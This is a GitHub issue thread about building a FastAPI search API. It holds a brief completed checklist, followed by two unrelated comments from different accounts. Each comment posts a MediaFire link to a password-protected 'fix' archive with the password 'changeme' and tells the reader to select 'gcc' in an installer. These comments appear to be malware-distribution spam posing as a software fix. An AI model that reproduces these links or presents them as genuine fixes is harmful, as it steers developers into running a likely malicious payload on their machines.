### ISSUE TITLE
[#12] Backend FastAPI search API 개발

### ISSUE THREAD

**Issue by MoonHeesun** [WeDontKnowAnything/jobAdream#35]
- [x] CRUD 생성
- [x] Schema 생성
- [x] router 생성

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
